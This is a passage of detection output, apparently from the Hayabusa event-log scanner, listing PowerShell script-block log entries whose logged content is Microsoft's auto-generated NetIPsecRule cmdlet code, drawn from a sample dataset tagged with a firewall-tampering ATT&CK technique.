[Parameter(Parameter",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] 